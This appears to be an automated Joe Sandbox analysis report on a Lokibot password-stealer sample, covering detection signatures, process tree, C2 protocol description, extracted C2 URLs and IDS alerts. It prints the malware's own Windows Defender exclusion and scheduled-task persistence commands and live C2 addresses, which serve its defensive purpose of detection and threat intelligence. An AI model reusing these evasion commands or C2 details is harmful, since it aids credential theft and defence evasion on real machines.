Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
LEmJJ87mUQ.exe

Overview

General Information

Sample name:LEmJJ87mUQ.exe
renamed because original name is a hash value
Original sample name:868444860f70d7825d5801e3ebdc8e9f0c5ffe72c3f42a938b7df98d50e10758.exe
Analysis ID:1567584
MD5:7e1d910ade786c9880194ce5e7c66c8b
SHA1:c2dee65fd0b225e9ecf1ea718d1015359f7132ce
SHA256:868444860f70d7825d5801e3ebdc8e9f0c5ffe72c3f42a938b7df98d50e10758
Tags:exeLokiuser-adrian__luca
Infos:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Lokibot
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Yara detected aPLib compressed binary
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • LEmJJ87mUQ.exe (PID: 5016 cmdline: "C:\Users\user\Desktop\LEmJJ87mUQ.exe" MD5: 7E1D910ADE786C9880194CE5E7C66C8B)
    • powershell.exe (PID: 3380 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aWBoUwiux.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 4564 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 3056 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aWBoUwiux" /XML "C:\Users\user\AppData\Local\Temp\tmpE3D.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 3064 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • RegSvcs.exe (PID: 2568 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • aWBoUwiux.exe (PID: 5572 cmdline: C:\Users\user\AppData\Roaming\aWBoUwiux.exe MD5: 7E1D910ADE786C9880194CE5E7C66C8B)
    • schtasks.exe (PID: 2508 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aWBoUwiux" /XML "C:\Users\user\AppData\Local\Temp\tmp33C7.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WerFault.exe (PID: 5016 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5572 -s 1788 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Loki Password Stealer (PWS), LokiBot"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
  • SWEED
  • The Gorgon Group
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws
{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "touxzw.ir/sirr/five/fre.php"]}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
    SourceRuleDescriptionAuthorStrings
    00000008.00000002.2395876159.00000000030A5000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
      00000000.00000002.2347808139.0000000004249000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
        00000000.00000002.2347808139.0000000004249000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
          00000000.00000002.2347808139.0000000004249000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000002.2347808139.0000000004249000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Lokibot_1f885282unknownunknown
            • 0x174f8:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
            Click to see the 45 entries
            SourceRuleDescriptionAuthorStrings
            9.2.aWBoUwiux.exe.39c9ed8.0.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
              9.2.aWBoUwiux.exe.39c9ed8.0.unpackWindows_Trojan_Lokibot_1f885282unknownunknown
              • 0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
              9.2.aWBoUwiux.exe.39c9ed8.0.unpackWindows_Trojan_Lokibot_0f421617unknownunknown
              • 0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
              9.2.aWBoUwiux.exe.39c9ed8.0.unpackLoki_1Loki Payloadkevoreilly
              • 0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
              • 0x133fc:$a2: last_compatible_version
              9.2.aWBoUwiux.exe.39c9ed8.0.unpackLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
              • 0x123ff:$des3: 68 03 66 00 00
              • 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
              • 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
              Click to see the 63 entries

              System Summary

              barindex
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aWBoUwiux.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aWBoUwiux.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\LEmJJ87mUQ.exe", ParentImage: C:\Users\user\Desktop\LEmJJ87mUQ.exe, ParentProcessId: 5016, ParentProcessName: LEmJJ87mUQ.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aWBoUwiux.exe", ProcessId: 3380, ProcessName: powershell.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aWBoUwiux.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aWBoUwiux.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\LEmJJ87mUQ.exe", ParentImage: C:\Users\user\Desktop\LEmJJ87mUQ.exe, ParentProcessId: 5016, ParentProcessName: LEmJJ87mUQ.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aWBoUwiux.exe", ProcessId: 3380, ProcessName: powershell.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aWBoUwiux" /XML "C:\Users\user\AppData\Local\Temp\tmp33C7.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aWBoUwiux" /XML "C:\Users\user\AppData\Local\Temp\tmp33C7.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\aWBoUwiux.exe, ParentImage: C:\Users\user\AppData\Roaming\aWBoUwiux.exe, ParentProcessId: 5572, ParentProcessName: aWBoUwiux.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aWBoUwiux" /XML "C:\Users\user\AppData\Local\Temp\tmp33C7.tmp", ProcessId: 2508, ProcessName: schtasks.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aWBoUwiux" /XML "C:\Users\user\AppData\Local\Temp\tmpE3D.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aWBoUwiux" /XML "C:\Users\user\AppData\Local\Temp\tmpE3D.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\LEmJJ87mUQ.exe", ParentImage: C:\Users\user\Desktop\LEmJJ87mUQ.exe, ParentProcessId: 5016, ParentProcessName: LEmJJ87mUQ.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aWBoUwiux" /XML "C:\Users\user\AppData\Local\Temp\tmpE3D.tmp", ProcessId: 3056, ProcessName: schtasks.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aWBoUwiux.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aWBoUwiux.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\LEmJJ87mUQ.exe", ParentImage: C:\Users\user\Desktop\LEmJJ87mUQ.exe, ParentProcessId: 5016, ParentProcessName: LEmJJ87mUQ.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aWBoUwiux.exe", ProcessId: 3380, ProcessName: powershell.exe

              Persistence and Installation Behavior

              barindex
              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aWBoUwiux" /XML "C:\Users\user\AppData\Local\Temp\tmpE3D.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aWBoUwiux" /XML "C:\Users\user\AppData\Local\Temp\tmpE3D.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\LEmJJ87mUQ.exe", ParentImage: C:\Users\user\Desktop\LEmJJ87mUQ.exe, ParentProcessId: 5016, ParentProcessName: LEmJJ87mUQ.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aWBoUwiux" /XML "C:\Users\user\AppData\Local\Temp\tmpE3D.tmp", ProcessId: 3056, ProcessName: schtasks.exe
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-03T17:14:16.044187+010020243121A Network Trojan was detected192.168.2.549749172.67.134.8880TCP
              2024-12-03T17:14:17.626140+010020243121A Network Trojan was detected192.168.2.549751172.67.134.8880TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-03T17:14:14.887037+010020253811Malware Command and Control Activity Detected192.168.2.549749172.67.134.8880TCP
              2024-12-03T17:14:16.418643+010020253811Malware Command and Control Activity Detected192.168.2.549751172.67.134.8880TCP
              2024-12-03T17:14:17.932918+010020253811Malware Command and Control Activity Detected192.168.2.549757172.67.134.8880TCP
              2024-12-03T17:14:19.561668+010020253811Malware Command and Control Activity Detected192.168.2.549763172.67.134.8880TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-03T17:14:19.163529+010020243131Malware Command and Control Activity Detected192.168.2.549757172.67.134.8880TCP
              2024-12-03T17:14:20.808835+010020243131Malware Command and Control Activity Detected192.168.2.549763172.67.134.8880TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-03T17:14:19.163529+010020243181Malware Command and Control Activity Detected192.168.2.549757172.67.134.8880TCP
              2024-12-03T17:14:20.808835+010020243181Malware Command and Control Activity Detected192.168.2.549763172.67.134.8880TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-03T17:14:14.887037+010020216411A Network Trojan was detected192.168.2.549749172.67.134.8880TCP
              2024-12-03T17:14:16.418643+010020216411A Network Trojan was detected192.168.2.549751172.67.134.8880TCP
              2024-12-03T17:14:17.932918+010020216411A Network Trojan was detected192.168.2.549757172.67.134.8880TCP
              2024-12-03T17:14:19.561668+010020216411A Network Trojan was detected192.168.2.549763172.67.134.8880TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-03T17:14:14.887037+010028257661Malware Command and Control Activity Detected192.168.2.549749172.67.134.8880TCP
              2024-12-03T17:14:16.418643+010028257661Malware Command and Control Activity Detected192.168.2.549751172.67.134.8880TCP
              2024-12-03T17:14:17.932918+010028257661Malware Command and Control Activity Detected192.168.2.549757172.67.134.8880TCP
              2024-12-03T17:14:19.561668+010028257661Malware Command and Control Activity Detected192.168.2.549763172.67.134.8880TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: http://touxzw.ir/sirr/five/fre.phpAvira URL Cloud: Label: malware
              Source: touxzw.ir/sirr/five/fre.phpAvira URL Cloud: Label: malware
              Source: 00000000.00000002.2347063114.0000000003181000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "touxzw.ir/sirr/five/fre.php"]}
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeReversingLabs: Detection: 55%
              Source: LEmJJ87mUQ.exeReversingLabs: Detection: 55%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeJoe Sandbox ML: detected
              Source: LEmJJ87mUQ.exeJoe Sandbox ML: detected
              Source: LEmJJ87mUQ.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: LEmJJ87mUQ.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: aWBoUwiux.exe, 00000009.00000002.2507494471.0000000006CE4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Accessibility.pdbh source: WERB83E.tmp.dmp.16.dr
              Source: Binary string: Accessibility.pdb source: WERB83E.tmp.dmp.16.dr
              Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: aWBoUwiux.exe, 00000009.00000002.2507494471.0000000006CE4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Windows.Forms.pdbT^ source: WERB83E.tmp.dmp.16.dr
              Source: Binary string: \??\C:\Windows\exe\zdr.pdb source: aWBoUwiux.exe, 00000009.00000002.2507494471.0000000006CE4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, RegSvcs.exe, 00000008.00000002.2395185499.0000000000BA2000.00000002.00000001.01000000.0000000D.sdmp
              Source: Binary string: System.Xml.ni.pdbRSDS# source: WERB83E.tmp.dmp.16.dr
              Source: Binary string: n(C:\Windows\zdr.pdb5 source: aWBoUwiux.exe, 00000009.00000002.2501437622.0000000000987000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: System.Core.ni.pdb source: WERB83E.tmp.dmp.16.dr
              Source: Binary string: Microsoft.VisualBasic.pdb source: WERB83E.tmp.dmp.16.dr
              Source: Binary string: symbols\exe\zdr.pdb30&n source: aWBoUwiux.exe, 00000009.00000002.2501437622.0000000000987000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: ?&nC:\Users\user\AppData\Roaming\zdr.pdb source: aWBoUwiux.exe, 00000009.00000002.2501437622.0000000000987000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: mscorlib.ni.pdb source: WERB83E.tmp.dmp.16.dr
              Source: Binary string: \??\C:\Windows\mscorlib.pdb source: aWBoUwiux.exe, 00000009.00000002.2507494471.0000000006CE4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: zdr.pdb source: LEmJJ87mUQ.exe, aWBoUwiux.exe.0.dr, WERB83E.tmp.dmp.16.dr
              Source: Binary string: C:\Windows\zdr.pdbpdbzdr.pdb source: aWBoUwiux.exe, 00000009.00000002.2507494471.0000000006CE4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: zdr.pdbws\zdr.pdbpdbzdr.pdb\zdr.pdb source: aWBoUwiux.exe, 00000009.00000002.2501437622.0000000000987000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\exe\zdr.pdb source: aWBoUwiux.exe, 00000009.00000002.2507494471.0000000006CE4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERB83E.tmp.dmp.16.dr
              Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: aWBoUwiux.exe, 00000009.00000002.2507494471.0000000006CE4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Drawing.pdb( source: WERB83E.tmp.dmp.16.dr
              Source: Binary string: @&n.pdb source: aWBoUwiux.exe, 00000009.00000002.2501437622.0000000000987000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: System.Xml.ni.pdb source: WERB83E.tmp.dmp.16.dr
              Source: Binary string: System.ni.pdbRSDS source: WERB83E.tmp.dmp.16.dr
              Source: Binary string: RegSvcs.pdb, source: RegSvcs.exe, 00000008.00000002.2395185499.0000000000BA2000.00000002.00000001.01000000.0000000D.sdmp
              Source: Binary string: zdr.pdbZ source: aWBoUwiux.exe, 00000009.00000002.2501437622.0000000000987000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\exe\zdr.pdb= source: aWBoUwiux.exe, 00000009.00000002.2507494471.0000000006CE4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Configuration.ni.pdb source: WERB83E.tmp.dmp.16.dr
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: aWBoUwiux.exe, 00000009.00000002.2501621888.0000000000AC3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mscorlib.pdb(G source: WERB83E.tmp.dmp.16.dr
              Source: Binary string: mscorlib.ni.pdbRSDS source: WERB83E.tmp.dmp.16.dr
              Source: Binary string: \??\C:\Windows\zdr.pdbM source: aWBoUwiux.exe, 00000009.00000002.2501621888.0000000000B1B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Configuration.pdb source: WERB83E.tmp.dmp.16.dr
              Source: Binary string: \??\C:\Windows\System.pdb source: aWBoUwiux.exe, 00000009.00000002.2507494471.0000000006CE4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Xml.pdb source: WERB83E.tmp.dmp.16.dr
              Source: Binary string: System.pdb source: aWBoUwiux.exe, 00000009.00000002.2507494471.0000000006CE4000.00000004.00000020.00020000.00000000.sdmp, WERB83E.tmp.dmp.16.dr
              Source: Binary string: System.Windows.Forms.pdb source: WERB83E.tmp.dmp.16.dr
              Source: Binary string: \??\C:\Windows\dll\System.pdb source: aWBoUwiux.exe, 00000009.00000002.2507494471.0000000006CE4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mscorlib.pdb source: aWBoUwiux.exe, 00000009.00000002.2507494471.0000000006CE4000.00000004.00000020.00020000.00000000.sdmp, WERB83E.tmp.dmp.16.dr
              Source: Binary string: \??\C:\Windows\dll\System.pdbZ~ source: aWBoUwiux.exe, 00000009.00000002.2507494471.0000000006CE4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: aWBoUwiux.exe, 00000009.00000002.2507494471.0000000006CE4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\zdr.pdb source: aWBoUwiux.exe, 00000009.00000002.2501621888.0000000000B1B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Drawing.pdb source: WERB83E.tmp.dmp.16.dr
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: aWBoUwiux.exe, 00000009.00000002.2507494471.0000000006CE4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\AppData\Roaming\zdr.pdb source: aWBoUwiux.exe, 00000009.00000002.2507494471.0000000006CE4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdb source: WERB83E.tmp.dmp.16.dr
              Source: Binary string: System.pdb$(,048 source: WERB83E.tmp.dmp.16.dr
              Source: Binary string: zdr.pdbSHA256T` source: LEmJJ87mUQ.exe, aWBoUwiux.exe.0.dr
              Source: Binary string: .pdb source: aWBoUwiux.exe, 00000009.00000002.2501437622.0000000000987000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\AppData\Roaming\aWBoUwiux.PDB source: aWBoUwiux.exe, 00000009.00000002.2507494471.0000000006CE4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\mscorlib.pdbu source: aWBoUwiux.exe, 00000009.00000002.2507494471.0000000006CE4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.ni.pdb source: WERB83E.tmp.dmp.16.dr
              Source: Binary string: System.Core.ni.pdbRSDS source: WERB83E.tmp.dmp.16.dr
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,8_2_00403D74
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]0_2_07B06900
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]0_2_07B068F0

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49749 -> 172.67.134.88:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49757 -> 172.67.134.88:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49749 -> 172.67.134.88:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49757 -> 172.67.134.88:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49749 -> 172.67.134.88:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49757 -> 172.67.134.88:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49751 -> 172.67.134.88:80
